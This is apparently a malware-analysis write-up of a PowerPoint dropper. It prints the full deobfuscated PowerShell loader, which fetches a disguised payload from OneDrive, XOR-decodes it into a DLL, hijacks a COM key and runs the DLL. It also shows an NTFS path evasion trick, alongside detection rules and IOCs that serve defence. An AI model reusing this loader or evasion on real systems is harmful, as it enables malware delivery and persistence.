New Evasion Technique Using Powerpoint

According to VirusTotal, the PowerPoint sample was first submitted to VT on 2022-02-02 and still had a 0/60 detection rate as of 2022-09-08.

The same file was submitted to MalwareBazaar on September 9, 2022, where most vendors likewise marked it as clean.

Virus Total Detection Rate

Infection Chain
Email Attachment ==> .ppt file ==> wscript.exe ==> powershell.exe ==> rundll32.exe

Infection Chain

In-depth Analysis

The malicious action is configured to fire when the user starts the slideshow and moves the mouse over the trigger object (a mouse-over action, so no click is required). wscript.exe then runs SyncAppvPublishingServer.vbs, a Microsoft-signed LOLBAS script that hands its argument to powershell.exe. The path used to reach the script is worth a close look:

.vbs:..\..\..\..\..\..\..\..\windows/System32::$index_allocation/SyncAppvPublishingServer.vbs

The ::$index_allocation suffix names the NTFS directory-index stream of System32, so the path still resolves to the real directory, but a detection that matches the literal string C:\Windows\System32\SyncAppvPublishingServer.vbs will not fire. The mixed forward and backward slashes and the long ..\ chain serve the same purpose.

Powerpoint Trigger Config for Mouse Over

The PowerShell stage is obfuscated; the deobfuscated version is below.


# Run-once guard: abort if local.lnk is present in the user's temp folder,
# otherwise create it with DeleteOnClose so it vanishes when the handle closes.
$t = 'c:\users\malware\appdata\local\temp\local.lnk';
if ([IO.File]::Exists($t)) { break; };
[IO.File]::Create($t, 1, [IO.FileOptions]::DeleteOnClose);

# Do not re-drop the DLL if it is already in %ALLUSERSPROFILE% (C:\ProgramData).
$dllPath = $ENV:ALLUSERSPROFILE + '\lmapi2.dll';
if ([IO.File]::Exists($dllPath)) { break; };

# Fetch the fake image from OneDrive (URL defanged).
$u = 'https[:]//9b5uja[.]am[.]files[.]1drv[.]com/y4mpYJ245I931DUGr7BV-dwLD7SReTqFr1N7eQOKSH_u-g2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-F6QcqADr-FowC_9PZi1Aj7uckcK8Uix_7ja1tF6C_8-5xYgm6zwjbXsrlEcTEenAyA8BzEaGPudutl1wMDkzVr6Wm-n8_qRmYejLgbNoQmPTUe3P5NKFFLRjeeU_JhvA/DSC0002.jpeg?download';
$f = (New-Object Net.WebClient).DownloadData($u);
if ($f.Count -lt 10000) { break; };   # abort on a short or blocked response
$f = $f[4..$f.Count];                 # drop the 4-byte header
$x = 24;                              # LCG seed
$f = $f | % {
    $x = (29 * $x + 49) % 256;        # keystream byte; first value is 233
    $_ = ($_ -bxor $x);
    $_
};
[IO.File]::WriteAllBytes('C:\ProgramData\lmapi2.dll', $f);

# 0x23 is '#': the ",#1" ordinal suffix is assembled at runtime.
$k = [Convert]::ToChar(0x23);
$z = "/c reg ADD HKCU\Software\Classes\CLSID\{2735412E-7F64-5B0F-8F00-5D77AFBE261E}\InProcServer32 /t REG_SZ /d C:\ProgramData\lmapi2.dll /ve /f /reg:64 && rundll32.exe C:\ProgramData\lmapi2.dll,${k}1";
cmd $z;
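To recover the dropped DLL from a captured DSC0002.jpeg without running the loader, the decoding loop above can be re-implemented offline. The following Python is an added example written for this post, not code from the sample or from DOCGuard; the 4-byte header value used to build the test input is an assumption (the loader never inspects it), and the fake payload is constructed.

```python
"""Offline re-implementation of the lmapi2.dll decoder from the PowerShell stage."""
import hashlib
from pathlib import Path
from typing import Iterator

MIN_SIZE = 10_000   # if ($f.Count -lt 10000) { break }
HEADER_SKIP = 4     # $f = $f[4..$f.Count]
SEED = 24           # $x = 24


def keystream(seed: int = SEED) -> Iterator[int]:
    """Byte-at-a-time LCG x = (29*x + 49) mod 256, yielding the updated x each step."""
    x = seed
    while True:
        x = (29 * x + 49) % 256
        yield x


def passes_size_check(blob: bytes) -> bool:
    """Mirror of the loader's sanity check on the downloaded response."""
    return len(blob) >= MIN_SIZE


def decode(blob: bytes) -> bytes:
    """Recover lmapi2.dll from the raw bytes of DSC0002.jpeg."""
    if not passes_size_check(blob):
        raise ValueError(f"{len(blob)} bytes: the loader would abort (< {MIN_SIZE})")
    return bytes(b ^ k for b, k in zip(blob[HEADER_SKIP:], keystream()))


def encode(payload: bytes, header: bytes = b"\xff\xd8\xff\xe0") -> bytes:
    """Inverse operation (XOR is symmetric); used here only to build test input.
    The header value is an assumption: the loader skips it without looking at it."""
    assert len(header) == HEADER_SKIP
    return header + bytes(b ^ k for b, k in zip(payload, keystream()))


def looks_like_pe(data: bytes) -> bool:
    """Quick plausibility check on the decoded output."""
    return data[:2] == b"MZ"


def decode_file(src: Path, dst: Path) -> str:
    """Decode src into dst and return dst's SHA-256 for comparison with the IOC table."""
    out = decode(src.read_bytes())
    dst.write_bytes(out)
    return hashlib.sha256(out).hexdigest()


if __name__ == "__main__":
    # Constructed round trip: a fake PE-like payload large enough to pass the size check.
    fake_dll = b"MZ" + bytes(range(256)) * 40
    assert decode(encode(fake_dll)) == fake_dll
    print("first keystream byte:", next(keystream()))  # 233
```

Point decode_file at a real capture of DSC0002.jpeg and compare the returned hash with the SHA256 of lmapi2.dll in the IOC table to confirm the decoding is exact.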

1. powershell.exe checks whether local.lnk exists in the user's temp folder and stops if it does. Otherwise it creates the file with FileOptions.DeleteOnClose, so the file is removed once its handle closes. The purpose is not obvious; because the handle returned by Create is never disposed, the file stays present (and the check would trip) until that handle is finalized or the process exits, which looks like a crude run-once guard.

Powershell Part1

2. powershell.exe checks whether lmapi2.dll already exists in ProgramData and stops if it does.

Powershell Part2

3. powershell.exe downloads a file named DSC0002.jpeg from OneDrive and stops if the response is shorter than 10,000 bytes. At the time of writing the URL was still reachable.

Powershell Part3

4. powershell.exe drops the first four bytes of DSC0002.jpeg, XORs the remainder with a byte stream generated by x = (29*x + 49) mod 256 starting from x = 24, and writes the result to C:\ProgramData\lmapi2.dll.

Powershell Part4

5. powershell.exe registers lmapi2.dll as the InProcServer32 of CLSID {2735412E-7F64-5B0F-8F00-5D77AFBE261E} under HKCU for persistence (COM hijacking, which needs no administrative rights; see https://pentestlab.blog/tag/inprocserver32/), then runs ordinal #1 of lmapi2.dll via rundll32.exe.

Powershell Part5
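The chain leaves a distinctive trail in process-creation telemetry. The following detection logic is an added example written for this post, not part of DOCGuard's analysis: it runs a few rule checks over constructed Sysmon-style process-creation records (the parent images, command-line arguments and field names are assumptions) and shows why the path string has to be normalized before matching, since the ::$index_allocation suffix and the forward slashes defeat a literal match on C:\Windows\System32\SyncAppvPublishingServer.vbs.

```python
"""Rule checks for the PowerPoint -> wscript -> powershell -> rundll32 chain."""
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1-style records; parent images, arguments and the
# benign control event are assumptions, not data from the sample.
EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "CommandLine": r'wscript.exe "..\..\..\..\..\..\..\..\windows/System32::$index_allocation/SyncAppvPublishingServer.vbs" ;<powershell one-liner>'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"powershell.exe -NoProfile -c <obfuscated stage>"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg ADD HKCU\Software\Classes\CLSID\{2735412E-7F64-5B0F-8F00-5D77AFBE261E}\InProcServer32 /t REG_SZ /d C:\ProgramData\lmapi2.dll /ve /f /reg:64"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rundll32.exe C:\ProgramData\lmapi2.dll,#1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign control
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe Get-Process"},
]

INDEX_ALLOC = re.compile(r"::\$index_allocation", re.IGNORECASE)
SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")


def normalize_path_string(s: str) -> str:
    """Undo the evasions in the trigger string so a plain substring match works:
    strip the NTFS ::$index_allocation suffix, unify slashes, collapse '..' hops."""
    s = INDEX_ALLOC.sub("", s).replace("/", "\\")
    parts: List[str] = []
    for part in s.split("\\"):
        if part == "..":
            if parts:
                parts.pop()
        elif part and part != ".":
            parts.append(part)
    return "\\".join(parts).lower()


def evaluate(ev: Dict[str, str]) -> List[str]:
    """Return the names of all rules a single event matches."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    cmd_l = cmd.lower()
    hits: List[str] = []
    if parent.endswith("\\powerpnt.exe") and image.endswith(SCRIPT_HOSTS):
        hits.append("office_spawns_script_host")
    if INDEX_ALLOC.search(cmd):
        hits.append("ntfs_index_allocation_in_path")
    if "system32\\syncappvpublishingserver.vbs" in normalize_path_string(cmd):
        hits.append("lolbas_syncappvpublishingserver")
    if parent.endswith(SCRIPT_HOSTS) and image.endswith("\\powershell.exe"):
        hits.append("script_host_spawns_powershell")
    if re.search(r"\breg(?:\.exe)?\s+add\b", cmd_l) and "\\inprocserver32" in cmd_l:
        hits.append("com_inprocserver32_hijack")
    m = re.search(r"rundll32(?:\.exe)?\s+(\S+\.dll),#?\d+", cmd_l)
    if m and "\\programdata\\" in m.group(1):
        hits.append("rundll32_ordinal_from_programdata")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> matched rule names, for events that matched at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := evaluate(ev))}


if __name__ == "__main__":
    for idx, rules in scan(EVENTS).items():
        print(idx, EVENTS[idx]["Image"], rules)
```

Each rule on its own is noisy (reg.exe touching InProcServer32 also happens during software installs); the chain becomes high-confidence when the script-host and PowerShell hits share a process tree rooted in POWERPNT.EXE, so correlate on ParentProcessId before alerting.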

DOCGuard Report

https://app.docguard.io/d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d/results/dashboard

DOCGuard Report

IOCs

IOC Table Output of DOCGuard

MITRE ATT&CK MATRIX MAPPING

Mitre Attack Matrix Mapping

Samples Details

File Name: d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d.ppt
File Type: Legacy PowerPoint File
SHA256: d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d
MD5: c0060c0741833af67121390922c44f91
File Size: 0.7 MB
Verdict: Malicious
Date: September 15th 2022, 1:21:51 am
Sample Details

IOCs

IOC Type: Value
URL: https[:]//9b5uja[.]am[.]files[.]1drv[.]com/y4mpYJ245I931DUGr7BV-dwLD7SReTqFr1N7eQOKSH_u-g2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-F6QcqADr-FowC_9PZi1Aj7uckcK8Uix_7ja1tF6C_8-5xYgm6zwjbXsrlEcTEenAyA8BzEaGPudutl1wMDkzVr6Wm-n8_qRmYejLgbNoQmPTUe3P5NKFFLRjeeU_JhvA/DSC0002.jpeg?download
URL: https[:]//kdmzlw[.]am[.]files[.]1drv[.]com/y4mv4glUgvW9nl8z8GU71P-hPw0oRtve9QpZ0pEgwJN1q_TlGY5yl5Mvkrc5rUh0Uxxknlr-1qymWyCbPrkKOFgL4CARScSn9UMhq3c5hSNOQsDOamYLmOfN61lUtQO10vxtn0I7QROJdOtQ42wDsaiACGR-5ZrmYwt0SmZkphGWQpT2gOFrsUxjg8_7QT01VTABiGr3T6xpWrTmFT5yu4toQ/DSC0001.jpeg?download
SHA256 (PPT): d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d
SHA256 (DSC0002.jpeg): be180a7c43734b7125b2d5cea7edd0174811a58113b048f5fe687db52db47fe3
SHA256 (lmapi2.dll): efa5b49bdd086125b2b7d4058d09566f1db5f183c2a6332c597322f85107667a
SHA256 (DSC0001.jpeg): dcbc485f71a0e60920a99bcb8b57c56fc58fcf100707fcbdb8c05b56431374ca
IOC Table